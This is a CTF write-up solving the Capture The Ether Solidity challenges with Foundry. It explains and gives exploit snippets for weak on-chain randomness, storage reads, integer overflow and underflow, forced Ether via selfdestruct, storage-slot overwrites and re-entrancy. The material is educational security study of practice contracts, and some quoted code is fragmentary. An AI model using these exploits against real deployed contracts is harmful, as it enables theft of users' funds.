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Capture the Ether Solutions

Solutions to the Capture The Ether CTF challenges using Foundry ⛳️


Most of the contracts were rewritten slightly so they still compile with newer solidity versions. Comments were added for those parts.

I also didn't add solutions for the accounts challenges because they are not related to smart contract vulnerabilites. If you want to read writeups for those challenges check out the writeups from cmichel



Guess the number

Call the guess function with the answer number 42 which is hardcoded in the contract

challenge.guess{value: 1 ether}(42);


Guess the secret number

The answer n is now a number that produces a specific answerHash which is not reversible

function guess(uint8 n) public payable {
        require(msg.value == 1 ether);

        // if (keccak256(n) == answerHash) {
        //     msg.sender.transfer(2 ether);
        // }

        if (keccak256(abi.encodePacked(n)) == answerHash) {
            payable(msg.sender).transfer(2 ether);

The answer n is defined as a uint8, which ranges from 0 to 255. We can brute force the answer via a for-loop until we get the specific hash.

for (uint8 i = 0; i <= type(uint8).max; i++) {
            bytes32 currentHash = keccak256(abi.encodePacked(i));

            if (currentHash == answerHash) {
                // log result
                console.log("Correct answer: ", i);

                // call contract
                challenge.guess{value: 1 ether}(i);


Guess the random number

In this case the answer is generated "randomly" and stored "internally" in the contract (default visibility of state variables is internal):

constructor() payable {
        require(msg.value == 1 ether);
        answer = uint8(
                        blockhash(block.number - 1),

Data in smart contracts can be read despite being declared as "internal" because in the end all data on the blockchain is public. The key here is to understand how the storage works, and that the answer is stored in slot 0 and therefore can be retrieved by calling:

uint8 answer = uint8(uint256(vm.load(address(challenge), 0)));


Guess the new number

The answer is a "random" number generated inside the function call:

function guess(uint8 n) public payable {
        require(msg.value == 1 ether);

        uint8 answer = uint8(
                        blockhash(block.number - 1),

        if (n == answer) {
            payable(msg.sender).transfer(2 ether);

This answer isn't actually random though. The EVM is deterministic, so it is not possible to achieve randomness inside it. Given the same inputs, it will output the same result, and we can exploit this. We can create a new contract that calculates the answer and calls the original contract with it. That way we can make sure that the "random" number is generated on the same block, and we can win every time.

        uint8 answer = uint8(
                        blockhash(block.number - 1),

        i_challenge.guess{value: 1 ether}(answer);

This only works if you let the attacker contract receive Ether:

receive() external payable {}

And don't forget to transfer the Ether from the attacker contract to your address (or create a withdraw function only callable by you) 💸


Predict the future

The guess answer now has to be set beforehand, and then settled on a new tx, as it requires to be on a future block

function lockInGuess(uint8 n) public payable {
  guess = n;
  settlementBlockNumber = block.number + 1;

function settle() public {
  require(block.number > settlementBlockNumber);
  uint8 answer = uint8(
                        blockhash(block.number - 1),
        ) % 10;

The "random" answer can only be a number between 0-9 because of the % 10.

With this in mind we can exploit it:

  1. Create an attacker contract and call lockInGuess() with any number between 0-9 through the contract
function lockNumber(uint8 _number) public payable {
        require(msg.value == 1 ether);
            _number >= 0 && _number <= 9,
            "Number must be in the 0-9 range"

        challenge.lockInGuess{value: 1 ether}(_number);
  1. Wait 2 blocks
  2. Call settle() through the attacker contract and revert in case challenge wasn't solved
function solveChallenge() public {
        // Reverts in case guess != answer
        require(challenge.isComplete(), "Try again");
        (bool success, ) ={value: address(this).balance}("");
        require(success, "sending eth to owner failed");

Call solveChallenge in concecutive blocks until solved. This way we only pay when we know we will win.


Predict the block hash

We now have to predict the hash of a future block, which will not be possible to brute-force:

function lockInGuess(bytes32 hash) public payable {
  guess = hash;
  settlementBlockNumber = block.number + 1;

function settle() public {
  require(block.number > settlementBlockNumber);
  bytes32 answer = blockhash(settlementBlockNumber);

But there is a catch! From Solidity documentation:

The block hashes are not available for all blocks for scalability reasons. You can only access the hashes of the most recent 256 blocks, all other values will be zero.

This means that after 256 + 1 + 1 blocks of locking our guess our "random" answer will be 0. So we we can exploit it:

  1. Call lockInGuess with bytes32(uint256(0))
  2. Wait for 258 blocks (257 blocks + 1 block because settlementBlockNumber = block.number + 1)
  3. Call settle



Token sale

The goal here is to steal some Ether from the contract.

In older versions of Solidity you could perform an overflow without reverting the tx. This was changed in v0.8.0.

It is possible to exploit the contract with that in mind tricking the require:

function buy(uint256 numTokens) public payable {
  require(msg.value == numTokens * PRICE_PER_TOKEN);

  balanceOf[msg.sender] += numTokens;

We can calculate the value of numTokens that makes the calculation overflow, and the amount of wei that has to be sent:

numTokens = (type(uint256).max / PRICE_PER_TOKEN) + 1;
msg.value = numTokens * PRICE_PER_TOKEN;

The resulting msg.value is around 0.41 ETH. Then, 1 token can be sold for 1 ETH, completing the challenge.


Token whale

The goal of this challenge is to accumulate at least 1,000,000 tokens with a starting balance and total supply of 1,000 tokens.

We can exploit this contract by underflowing a variable, converting it into a huge number of tokens:

function transferFrom(
  address from,
  address to,
  uint256 value
) public {
  require(balanceOf[from] >= value);
  require(balanceOf[to] + value >= balanceOf[to]);
  require(allowance[from][msg.sender] >= value);

  allowance[from][msg.sender] -= value;
  _transfer(to, value);

function _transfer(address to, uint256 value) internal {
  balanceOf[msg.sender] -= value; // <======== THIS
  balanceOf[to] += value;

  emit Transfer(msg.sender, to, value);

If we can make balanceOf[msg.sender] -= value; underflow, we'll solve the challenge.

In order to do that, the balance of the msg.sender has to be lower than the value of tokens.

It wouldn't be possible in a simple transfer(), as it checks the balance of the msg.sender.

On the other hand, transferFrom() calls _transfer() but only checks the allowance and not the balance of msg.sender.

With all of this information we're able to perform the attack:

  1. Transfer 501 tokens from the player to another player controlled address
  2. The balance of the Attacker will be 499 and the Secondary Account will be 501
  3. Approve to spend 500 tokens from the original address
  4. Let the Attacker call transferFrom to move 500 tokens from the Secondary Account to his own address

The Secondary account has enough balance (501 - 500), so it passes the require statements.

The Attacker account balance will underflow (499-500), so instead of resulting in -1, it is MAX_UINT_256, exploiting the contract.


Retirement Fund

In this challenge we're the beneficiary of part of a retirement fund if the owner withdraws the Ether early.

The only callable function by the beneficiary is collectPenalty:

function collectPenalty() public {
  require(msg.sender == beneficiary);

  uint256 withdrawn = startBalance - address(this).balance;
  require(withdrawn > 0);


Here we can "bypass" the require(withdrawn > 0) if we can perform an underflow in startBalance - address(this).balance.

It doesn't seem to be possible to add more funds with any function, and the contract does not have a payable fallback function. So it shouldn't be possible to do it, right?

But there are other ways to force sending Ether to a contract. In this case we're making use of the following:


A malicious contract can use selfdestruct to force sending Ether to any contract.

We can create a contract that autodestructs and sends Ether to the original contract address, perform an underflow, and then withdraw the funds



In this challenge we have to make isComplete return true, but there doesn't seem to be any place to change it.

contract MappingChallenge {
  bool public isComplete;
  uint256[] map;

  function set(uint256 key, uint256 value) public {
    if (map.length <= key) {
      map.length = key + 1;

    map[key] = value;

  function get(uint256 key) public view returns (uint256) {
    return map[key];

There are only two places that modify the storage: map.length = key + 1; and map[key] = value;. So we may want to check if we can exploit that somehow.

Contracts have a storage of 2^256 slots of 32-bytes.

State variables of contracts are stored in storage in a compact way such that multiple values sometimes use the same storage slot. Data is stored contiguously item after item starting with the first state variable, which is stored in slot 0.

That said, we know that isComplete is stored in slot 0.

Due to their unpredictable size, mappings and dynamically-sized array types cannot be stored “in between” the state variables preceding and following them. Instead, they are considered to occupy only 32 bytes with regards to the rules above and the elements they contain are stored starting at a different storage slot that is computed using a Keccak-256 hash.

Using this info we can set isComplete to true with the following steps:

  1. Calculate starting slot of array entries
uint256 startingSlot = uint256(keccak256(abi.encode(1)));
  1. Using an overflow we can get to storage slot 0 where isComplete is stored
uint256 attackSlot = type(uint256).max - startingSlot + 1;
  1. Set isComplete to 1
challenge.set(attackSlot, 1);



In this challenge we have to withdraw all the Ether from the contract. The only place where it is possible is:

function withdraw() public {
  require(msg.sender == owner);

But it requires to be the owner. So, we'll have to find a way to become the new owner.

That's where we get to the donate() function which has 2 major problems. First it calculates scale wrong, as it results in 10**36. Also the donation variable has no location defined.

Donation donation;

In this case, it assumes storage by default, leading to an unexpected behavior. It acts as a pointer to the storage, and it will write to the first slots when changing its attributes:

struct Donation {
  uint256 timestamp;
  uint256 etherAmount;

Donation[] public donations;
address public owner;

Setting the timestamp will write to the slot 0 => the array length, and setting etherAmount will write to the slot 1 => the owner.

So, to set the owner we just have to set etherAmount to our address.

The only reamaining challenge is passing the require(msg.value == etherAmount / scale);

It is straightforward. We convert our a decimal number and divide by the scale (10**36)


Fifty Years

The goal of this challenge is to withdraw all the Ether from the contract.

In order to do that we will need to call the withdraw function and satisfy two requirements. We're the owner, so that's fine. The second conditions is that we wait 50 years to withdraw the Ether:

function withdraw(uint256 index) public {
  require(msg.sender == owner);
  require(now >= queue[index].unlockTimestamp);
  // ...

50 years is too long, so we'll try to find a way of modifying queue[index].unlockTimestamp, so that it satisfies the requirement.

function upsert(uint256 index, uint256 timestamp) public payable {
  if (index >= head && index < queue.length) {
    Contribution storage contribution = queue[index];
    contribution.amount += msg.value;
  } else {
    require(timestamp >= queue[queue.length - 1].unlockTimestamp + 1 days);

    contribution.amount = msg.value;
    contribution.unlockTimestamp = timestamp;

There's a vulnerability that might be exploited here. The contribution variable has an uninitialized storage pointer. Meaning that modifying it will modify the first slots of the storage: contribution.amount will change the slot 0, which corresponds to the array length, and contribution.unlockTimestamp will modify the slot 1, which is the head variable.

First we will expand the array length, so that we can later modify any slot in the storage. We also have to satisfy this condition:

require(timestamp >= queue[queue.length - 1].unlockTimestamp + 1 days);

So, we will satisfy the condition by overflowing the result in a way that it equals 0 => timestamp = 2^256 - 1 day. We will also send value = 1, so that it updates contribution.amount => slot 0 => array length.

Then we have to reset the head value which was overwritten previously with garbage. This will also increase the array length by one.

We can finally create a contract that autodestructs and sends the remaining wei we need to pass the withdraw requirements.

Call withdraw and we're done :)


Assume ownership

The constructor function was misspelled making it public.

function AssumeOwmershipChallenge() public {
        owner = msg.sender;

We simply have to call it to solve this challenge.


Token bank

The token bank contract uses an ERC-223 token.

This token standard calls tokenFallback() on the recipient of a transfer() in case it is a contract.

Knowing this we immediately want to look for possible re-entrancy attacks.

And thats how we solve this challenge. In this case the balance is updated after calling the transfer() function.

require(token.transfer(msg.sender, amount));
    balanceOf[msg.sender] -= amount;

So it is possible to create a contract which exploits that via a re-entrancy attack and withdraw all the tokens.



The following ressources were a big help in solving this CTF:

I especially want to thank 0xJuancito because I used most of his writeups cause I couldn't have worded them better myself


Solutions to the Capture The Ether CTF challenges using Foundry ⛳️






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